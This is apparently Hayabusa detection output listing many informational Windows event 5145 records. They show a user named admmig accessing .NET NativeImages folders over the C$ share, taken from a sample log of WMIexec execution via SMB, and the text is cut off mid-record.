10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share 